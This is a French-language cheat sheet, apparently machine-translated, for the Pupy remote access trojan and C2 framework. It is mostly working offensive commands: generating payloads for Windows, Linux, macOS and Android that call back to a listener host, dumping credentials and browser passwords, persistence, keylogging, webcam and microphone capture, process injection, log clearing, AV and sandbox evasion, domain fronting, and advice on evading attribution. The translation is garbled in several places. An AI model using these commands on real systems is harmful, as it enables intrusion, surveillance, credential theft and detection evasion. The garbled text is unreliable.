Pupy C2 Cadre feuille de chaleur
Aperçu général
Pupy est un outil d'accès à distance ouvert, multiplateforme (RAT) et un cadre post-exploitation écrit en Python et C. Il prend en charge les plates-formes Windows, Linux, OSX et Android avec des capacités d'exécution mémoire seulement et un design d'empreinte minimal.
C'est pas vrai. Attention : Cet outil est destiné aux tests de pénétration autorisés et aux exercices d'équipe rouge seulement. Assurez-vous d'avoir une autorisation appropriée avant d'utiliser dans tout environnement.
Installation
Installation Git
# Clone repository
git clone --recursive https://github.com/n1nj4sec/pupy.git
cd pupy
# Install dependencies (Ubuntu/Debian)
sudo apt-get install python2.7-dev python-pip python-setuptools build-essential swig python-dev libssl-dev libffi-dev
# Install Python requirements
pip install -r pupy/requirements.txt
# Create workspace
./create-workspace.py -DG pupyws
cd pupyws
Installation Docker
# Build Docker image
git clone --recursive https://github.com/n1nj4sec/pupy.git
cd pupy
docker build -t pupy .
# Run Pupy in Docker
docker run -it -v /tmp/pupyws:/opt/pupy/pupyws pupy
```_
### Installation de Windows
```bash
# Install Python 2.7
# Download and install Microsoft Visual C++ Compiler for Python 2.7
# Clone repository
git clone --recursive https://github.com/n1nj4sec/pupy.git
cd pupy
# Install requirements
pip install -r pupy/requirements.txt
# Create workspace
python create-workspace.py pupyws
cd pupyws
```_
## Utilisation de base
### Démarrer Pupy Server
```bash
# Start server with default configuration
./pupysh
# Start with custom configuration
./pupysh --config custom_config.py
# Start with specific transport
./pupysh --transport ssl
Génération de clients
# Generate Windows client
gen -f client -O windows -A x86 -o windows_client.exe
# Generate Linux client
gen -f client -O linux -A x64 -o linux_client
# Generate Android APK
gen -f apk -o android_client.apk
Référence de commande
Gestion des serveurs
| Command | Description |
|---|---|
help |
Show help menu |
sessions |
List active sessions |
session -i <id> |
Interact with session |
jobs |
List running jobs |
kill <job_id> |
Kill running job |
exit |
Exit Pupy server |
Génération de clients
| Command | Description |
|---|---|
gen -h |
Show generation help |
gen -f client -O <os> -A <arch> |
Generate client |
gen -f apk |
Generate Android APK |
gen -f py |
Generate Python payload |
gen -f ps1 |
Generate PowerShell payload |
Interactions de séance
| Command | Description |
|---|---|
info |
Show session information |
shell |
Get interactive shell |
upload <local> <remote> |
Upload file |
download <remote> <local> |
Download file |
screenshot |
Take screenshot |
webcam_snap |
Take webcam snapshot |
keylogger |
Start keylogger |
Options de génération de clients
Clients Windows
# Windows executable (x86)
gen -f client -O windows -A x86 -o windows_x86.exe
# Windows executable (x64)
gen -f client -O windows -A x64 -o windows_x64.exe
# Windows DLL
gen -f dll -O windows -A x86 -o windows_dll.dll
# Windows service executable
gen -f client -O windows -A x64 --service -o windows_service.exe
# PowerShell payload
gen -f ps1 -o payload.ps1
Clients Linux
# Linux ELF (x86)
gen -f client -O linux -A x86 -o linux_x86
# Linux ELF (x64)
gen -f client -O linux -A x64 -o linux_x64
# Linux shared library
gen -f so -O linux -A x64 -o linux_lib.so
# Python payload
gen -f py -o payload.py
clients macOS
# macOS binary
gen -f client -O darwin -A x64 -o macos_client
# macOS application bundle
gen -f app -O darwin -A x64 -o macos_app.app
Clients Android
# Android APK
gen -f apk -o android_client.apk
# Android APK with custom package name
gen -f apk --package com.example.app -o custom_android.apk
Options de transport
Transports SSL
# Start SSL listener
listen --port 443 ssl
# Generate client with SSL transport
gen -f client -O windows -A x64 --transport ssl_connect --host 192.168.1.100:443
Transport HTTP
# Start HTTP listener
listen --port 80 http
# Generate client with HTTP transport
gen -f client -O windows -A x64 --transport http --host 192.168.1.100:80
Transports TCP
# Start TCP listener
listen --port 4444 tcp
# Generate client with TCP transport
gen -f client -O windows -A x64 --transport tcp_cleartext --host 192.168.1.100:4444
Transports obfusés
# Obfs3 transport
listen --port 8080 obfs3
# Generate client with obfs3
gen -f client -O windows -A x64 --transport obfs3 --host 192.168.1.100:8080
Modules post-exploitation
Informations sur le système
# Get system information
run sysinfo
# Get environment variables
run getenv
# Get installed software
run installed_software
# Get running processes
run ps
# Get network connections
run netstat
Récolte crédible
# Dump Windows credentials
run hashdump
# Extract browser passwords
run browser_dump
# Dump WiFi passwords
run wifi_passwords
# Extract clipboard content
run clipboard
Persistance
# Install persistence
run persistence
# Create scheduled task (Windows)
run schtasks
# Registry persistence (Windows)
run registry_persistence
# Cron job persistence (Linux)
run cron_persistence
Opérations réseau
# Port scanning
run portscan -t 192.168.1.0/24
# Network discovery
run network_discovery
# ARP spoofing
run arp_spoof -t 192.168.1.10 -g 192.168.1.1
# DNS spoofing
run dns_spoof -d example.com -i 192.168.1.100
Surveillance
# Start keylogger
run keylogger
# Take screenshot
run screenshot
# Record microphone
run record_mic -t 30
# Webcam snapshot
run webcam_snap
# Webcam stream
run webcam_stream
Caractéristiques avancées
Exécution de mémoire
# Load module in memory
load_module /path/to/module.py
# Execute in memory
run memory_exec -f /path/to/executable
# Reflective DLL loading (Windows)
run reflective_dll -f /path/to/dll.dll
Injection de procédé
# Inject into process
run inject -p <pid> -f /path/to/payload
# Process hollowing
run process_hollow -t notepad.exe -f /path/to/payload
# DLL injection
run dll_inject -p <pid> -f /path/to/dll.dll
Piquant
# SOCKS proxy
run socks -p 1080
# Port forwarding
run portfwd -L 8080:192.168.2.10:80
# Reverse port forwarding
run portfwd -R 9090:127.0.0.1:22
Anti-forensiques
# Clear event logs (Windows)
run clear_logs
# Timestomp files
run timestomp -f /path/to/file -t "2020-01-01 12:00:00"
# Secure delete
run secure_delete -f /path/to/file
# Clear tracks
run clear_tracks
Techniques d'évacuation
Obfuscation de la charge utile
# Generate with packer
gen -f client -O windows -A x64 --packer upx -o packed_client.exe
# Custom obfuscation
gen -f client -O windows -A x64 --obfuscate -o obfuscated_client.exe
# Encrypted payload
gen -f client -O windows -A x64 --encrypt -o encrypted_client.exe
Anti-analyse
# VM detection
def check_vm():
import subprocess
try:
output = subprocess.check_output(['systeminfo'], shell=True)
vm_indicators = ['VMware', 'VirtualBox', 'QEMU', 'Hyper-V']
for indicator in vm_indicators:
if indicator in output.decode():
return True
except:
pass
return False
# Sandbox evasion
import time
import random
time.sleep(random.randint(60, 300)) # Random sleep
Obfuscation de la circulation
# Domain fronting
gen -f client -O windows -A x64 --transport http --host cdn.example.com --front-domain legitimate-site.com
# Custom User-Agent
gen -f client -O windows -A x64 --transport http --user-agent "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"
Configuration
Configuration du serveur
# pupy.conf
[pupyd]
workdir = pupyws
scriptlets_path = packages/all;packages/windows;packages/linux;packages/darwin
[ssl]
keyfile = keys/server.key
certfile = keys/server.crt
[http]
port = 80
ssl_port = 443
[logging]
level = INFO
file = pupy.log
Configuration du client
# Custom transport configuration
TRANSPORT_KWARGS = \\\\{
'ssl': \\\\{
'cert_reqs': ssl.CERT_NONE,
'ssl_version': ssl.PROTOCOL_TLSv1_2,
'ciphers': 'ECDHE+AESGCM:ECDHE+CHACHA20:DHE+AESGCM'
\\\\},
'http': \\\\{
'user_agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64)',
'headers': \\\\{'Accept': 'text/html,application/xhtml+xml'\\\\},
'proxy': \\\\{'http': 'http://proxy:8080'\\\\}
\\\\}
\\\\}
Dépannage
Problèmes de connexion
# Check listener status
jobs
# Test connectivity
telnet server_ip port
# Check firewall rules
iptables -L
netsh advfirewall show allprofiles
Problèmes de génération de clients
# Install missing dependencies
pip install -r pupy/requirements.txt
# Rebuild client templates
./create-workspace.py -DG pupyws
# Check Python version
python --version # Should be 2.7.x
Erreurs de chargement du module
# Update module path
export PYTHONPATH=$PYTHONPATH:/opt/pupy/pupy
# Reinstall requirements
pip install --upgrade -r pupy/requirements.txt
# Check module dependencies
python -c "import module_name"
Problèmes de performance
# Reduce beacon interval
session -i <id>
set_beacon_interval 30
# Optimize transport
# Use faster transports like TCP for internal networks
# Use compressed transports for slow connections
Sécurité opérationnelle
Configuration des infrastructures
- Utiliser des redirectionurs et des chaînes proxy
- Mettre en œuvre une bonne gestion des certificats
- Utiliser les domaines légitimes et l'hébergement
- Rotation régulière des infrastructures
- Contrôle de détection et d'attribution
Sécurité des communications
- Utiliser des transports chiffrés (SSL/TLS)
- Mettre en œuvre une bonne gestion des clés
- Utilisez le frontage de domaine si possible
- Varier les modes de communication
- Mettre en œuvre un traitement approprié des erreurs
Sécurité de la charge utile
- Utiliser l'obfuscation et l'emballage
- Mettre en œuvre des techniques anti-analyse
- Utiliser des charges utiles échelonnées lorsque possible
- Mise à jour régulière et rotation des charges utiles
- Essai par rapport aux solutions AV actuelles
Ressources
- Résistoire Pupy GitHub
- [Documentation sur les chiots] (LINK_4)
- [n1nj4sec Blog] (LINK_4)
- [Référence des modules de pupy] (LINK_4)
*Cette feuille de triche fournit une référence complète pour l'utilisation de Pupy C2 Framework. Assurez-vous toujours d'avoir une autorisation appropriée avant d'utiliser cet outil dans n'importe quel environnement. *